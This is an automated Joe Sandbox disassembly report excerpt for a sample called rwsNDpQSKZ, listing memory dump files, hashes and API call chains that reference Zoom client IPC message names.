                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.mapi.outlook.get.mapi.calendar.events$strJsonEvents
                • API String ID: 3166440930-2161916155
                • Opcode ID: ab2ff0e364dfffd5f9e22fa7bd240393c3913a20013c56d849b4f9695ad85856
                • Instruction ID: 1f59ea29537007276735d23abd79ffa50944ebf77ced4cea509e38621c5428df
                • Opcode Fuzzy Hash: ab2ff0e364dfffd5f9e22fa7bd240393c3913a20013c56d849b4f9695ad85856
                • Instruction Fuzzy Hash: DCE0D8B5A003C067CB20BB108C85B1E66B5B790756F01493CB5025B392CBF84984D774
                APIs
                • __EH_prolog3.LIBCMT ref: 00C728D7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.getsupportcountryinfo.request,00009E88,JsCallID,00000004), ref: 00C728F2
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: JsCallID$com.zoom.app.cci.ccivideo.getsupportcountryinfo.request
                • API String ID: 3166440930-535446586
                • Opcode ID: 17cba80d372adc081639578311093a2996436653004a4c4361e9d37c0219bd90
                • Instruction ID: 04bb1aad923f439c50e80d18ee060433d246fd1c95319cce820d28944654c9ef
                • Opcode Fuzzy Hash: 17cba80d372adc081639578311093a2996436653004a4c4361e9d37c0219bd90
                • Instruction Fuzzy Hash: EFE0D8B0A003C067D710BB559C85B1F66B4A750716F50446CB3059B3D2CBF44984C7B5
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76887
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.ps.pt_request_active_app_ex,00013896,recording_type,00000004), ref: 00C768A2
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.ps.pt_request_active_app_ex$recording_type
                • API String ID: 4281283084-3344903612
                • Opcode ID: abe498bd24e4f411af7f46e3d3a08670e158c42179ceac1d293097cce2b6ad96
                • Instruction ID: 0404982c8bcdfad053f3ff3f8e457667ba62b77b04705c3bfe01c6ae9b9470d3
                • Opcode Fuzzy Hash: abe498bd24e4f411af7f46e3d3a08670e158c42179ceac1d293097cce2b6ad96
                • Instruction Fuzzy Hash: 7EE0D8F1A0479057C730BB154C4975E66A49B8471AF50456CB1065F3C2CBF44940DF75
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6C897
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.exit.process.request,00009D08,ProcessID,00000004), ref: 00C6C8B2
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: ProcessID$com.zoom.app.assistant.exit.process.request
                • API String ID: 4281283084-3478587648
                • Opcode ID: 71c65b332e4e5cc338c218ccd87a9da4ef57922d0a0cf714d7d1c26ce24dc244
                • Instruction ID: d11c13e60cf48616957da1c23e00b70c27cfbe71ce0c378b388bf3c5b0b12e76
                • Opcode Fuzzy Hash: 71c65b332e4e5cc338c218ccd87a9da4ef57922d0a0cf714d7d1c26ce24dc244
                • Instruction Fuzzy Hash: 7CE0D8B0A5038097C7307B144C5575E77A4AF90716F50046DB1415B3D2CBF84844EB75
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E8B7
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.virtualaudio.message.unload.service.response,00009DD3,result,00000004), ref: 00C6E8D2
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.assistant.virtualaudio.message.unload.service.response$result
                • API String ID: 4281283084-1385566299
                • Opcode ID: e17f0ae16d38b5db65d845525248bbcf1daa1f7961c6af22d311e86ad06f0281
                • Instruction ID: 383f73060b074310993de9e989b07c73a5e505004dd9b390bddb757bea02f94f
                • Opcode Fuzzy Hash: e17f0ae16d38b5db65d845525248bbcf1daa1f7961c6af22d311e86ad06f0281
                • Instruction Fuzzy Hash: 45E0D87194078067DB10BF159C45B1EA2A4A74475DF44442DB2045F3D2CFF40904EB78
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70847
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.log.stopchannel,00009DA0,ChannelId,00000004), ref: 00C70862
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: ChannelId$com.zoom.app.log.stopchannel
                • API String ID: 4281283084-1630933032
                • Opcode ID: 8ff2ba74daec59b896763f8598adc5c4c4ef50ca1794ea8d959c9496b156e4bf
                • Instruction ID: 8bf3717fc90f1fc7c5669df839df851a6d9584183f7aa4cf4c1b57b47a451b19
                • Opcode Fuzzy Hash: 8ff2ba74daec59b896763f8598adc5c4c4ef50ca1794ea8d959c9496b156e4bf
                • Instruction Fuzzy Hash: 94E0D8B0A44380E7C7207B15CC4571E77B4AB40716F508419B1455B3D2CBF54848DFB5
                APIs
                • __EH_prolog3.LIBCMT ref: 00C68857
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.pt.termConf,0000271F,Reason,00000004), ref: 00C68872
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Reason$com.Zoom.app.pt.termConf
                • API String ID: 3166440930-4274150399
                • Opcode ID: b11c10a6944a60efb659414fd70171c18cb2baf7d3cb2e8d3a69f3d4f7aceeb5
                • Instruction ID: 98e04afe1db2c28f41b7b503ed2c9594d15bdc7ae2dc49ae225fb0380ef5f518
                • Opcode Fuzzy Hash: b11c10a6944a60efb659414fd70171c18cb2baf7d3cb2e8d3a69f3d4f7aceeb5
                • Instruction Fuzzy Hash: 1DE0D8B0A043C097C7206B149C89B1E66A4BB5475BF40092CB6015F3D6CBF44844C774
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E857
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.virtualaudio.message.unload.service.request,00009DD2,roomName,00000004), ref: 00C6E872
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.assistant.virtualaudio.message.unload.service.request$roomName
                • API String ID: 3166440930-350828089
                • Opcode ID: 95f9f8fba051d47fea8de971cc073465d2ca99cd0d7fe25b6448fc65f78a014d
                • Instruction ID: 9445059535001214cfcb86a22d09f490a420f547b636901e4eb8df9b3472df14
                • Opcode Fuzzy Hash: 95f9f8fba051d47fea8de971cc073465d2ca99cd0d7fe25b6448fc65f78a014d
                • Instruction Fuzzy Hash: 18E0D8B4A003C0B7D7207B154C85B1E66B49B94B16F504519B6115F3D2CBF48884D778
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72877
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.cancelinvitebyphone.request,00009E86,JsCallID,00000004), ref: 00C72892
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
